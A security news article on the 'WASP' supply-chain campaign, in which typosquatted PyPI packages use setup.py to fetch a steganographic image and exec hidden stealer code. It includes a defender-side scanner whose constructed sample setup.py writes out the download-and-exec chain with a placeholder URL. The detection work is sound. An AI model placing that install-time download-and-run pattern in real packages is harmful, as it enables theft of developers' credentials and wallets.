Researchers from Check Point and Phylum identified a new supply chain attack targeting Python developers: victims are lured into downloading typosquatted Python packages that contain malicious code intended to compromise their systems.
Researchers from Checkmarx tracked the attacker by combining the two reports from Check Point and Phylum, and named the threat actor “WASP”.
During the investigation and tracking attempt, the threat actor appeared to be using steganography and polymorphism techniques to stay under the radar. In addition, the actor maintained multiple fake GitHub profiles with fake followers to make the packages look legitimate.
WASP stealer is malware that specialises in stealing Discord accounts, passwords, crypto wallets, credit card details and other files of interest, and exfiltrates them to attacker-controlled servers.
Additionally, researchers found that the WASP operator was selling the toolkit for $20, payable in cryptocurrency or gift cards.
“The malicious package researchers detected was named ‘apicolor’. At first glance, it seemed like one of the many in-development packages on PyPI,” reads the report.
Next, the setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory.
Then the setup.py script uses the “lsb.reveal” function from the freshly installed judyb package to extract the hidden code from the downloaded image.
“After taking a deeper look into the package installation script, researchers noticed a strange, non-trivial, code section at the beginning. It starts by manually installing extra requirements (not through the more common requirements section), then it downloads a picture from the web and uses the newly installed package to process the picture and trigger the processing generated output using the exec command.” Below is the sample code snippet.
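As an added example (not from the report and not the malicious script itself), a defender-side heuristic that statically parses a setup.py with Python's ast module and flags the install-time sequence described above: pip invoked from the script, a network download, an lsb.reveal call, and exec/eval. Both sample scripts are constructed here, and the URL is a placeholder.

```python
import ast

# Constructed sample that mirrors the install-time sequence described in the report
# (manual pip install, image download to temp, lsb.reveal, exec). Not the real apicolor script.
SUSPICIOUS_SETUP = '''
import os, subprocess, sys, tempfile, urllib.request
subprocess.check_call([sys.executable, "-m", "pip", "install", "judyb"])
from judyb import lsb
path = os.path.join(tempfile.gettempdir(), "image.png")
urllib.request.urlretrieve("https://example.invalid/image.png", path)  # placeholder URL
exec(lsb.reveal(path))
from setuptools import setup
setup(name="demo")
'''
# Constructed benign control with a normal declarative dependency list.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="demo", install_requires=["requests"])
'''

DOWNLOAD_CALLS = {"urlretrieve", "urlopen", "get"}  # urllib.request / requests (heuristic)

def _callee(node: ast.Call) -> str:
    """Name of the function being called: exec(...) -> 'exec', lsb.reveal(...) -> 'reveal'."""
    f = node.func
    return f.id if isinstance(f, ast.Name) else f.attr if isinstance(f, ast.Attribute) else ""

def scan_setup_py(source: str) -> dict:
    """Flag install-time indicators in a setup.py and return them with a total score."""
    found = {"exec_or_eval": False, "pip_from_script": False,
             "stego_reveal": False, "network_download": False}
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _callee(node)
        if name in ("exec", "eval"):
            found["exec_or_eval"] = True
        elif name == "reveal":
            found["stego_reveal"] = True
        elif name in DOWNLOAD_CALLS:
            found["network_download"] = True
        # String literals anywhere inside this call, e.g. the argv list handed to subprocess.
        strs = {c.value for c in ast.walk(node)
                if isinstance(c, ast.Constant) and isinstance(c.value, str)}
        if {"pip", "install"} <= strs or any("pip install" in s for s in strs):
            found["pip_from_script"] = True
    found["score"] = sum(1 for v in found.values() if v is True)
    return found

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, scan_setup_py(src))
```

A score of 3 or 4 on a package's setup.py is a strong signal to quarantine it before installation; a single hit (for example a lone network download) warrants manual review rather than an automatic block.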
The researchers also stated that they had identified the threat actor’s profile via a Discord server, which is revealed here.
“Threat actors have progressed from the ‘mimic a common package and slightly hide your malicious code’ technique. They are creating organized campaigns that directly target certain types of users. Moving the infection phase from the highly watched PyPI platform to a more crowded domain, such as GitHub, makes detecting malicious packages more difficult,” concludes the report.
Indicators of compromise: